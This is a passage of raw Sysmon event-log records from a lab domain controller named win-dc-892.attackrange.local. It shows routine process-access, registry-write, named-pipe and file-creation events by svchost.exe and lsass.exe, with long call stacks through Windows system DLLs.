ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:45.487{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000614) 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.471{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.471{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.471{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.456{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.159{266CAFBE-646C-6064-1000-00000000AE01}1124\Winsock2\CatalogChangeListener-464-0C:\Windows\system32\svchost.exe 17141700x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.159{266CAFBE-646C-6064-1000-00000000AE01}1124\SessEnvPublicRpcC:\Windows\system32\svchost.exe 11241100x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.065{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 17141700x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.065{266CAFBE-646C-6064-1000-00000000AE01}1124\atsvcC:\Windows\system32\svchost.exe 17141700x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.049{266CAFBE-646A-6064-0B00-00000000AE01}856\Winsock2\CatalogChangeListener-358-1C:\Windows\system32\lsass.exe 
13241300x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.049{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\srvnet\Parameters\MajorSequenceDWORD (0x000001ae) 17141700x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.034{266CAFBE-646A-6064-0B00-00000000AE01}856\Winsock2\CatalogChangeListener-358-0C:\Windows\system32\lsass.exe 13241300x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.018{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000001) 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.002{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
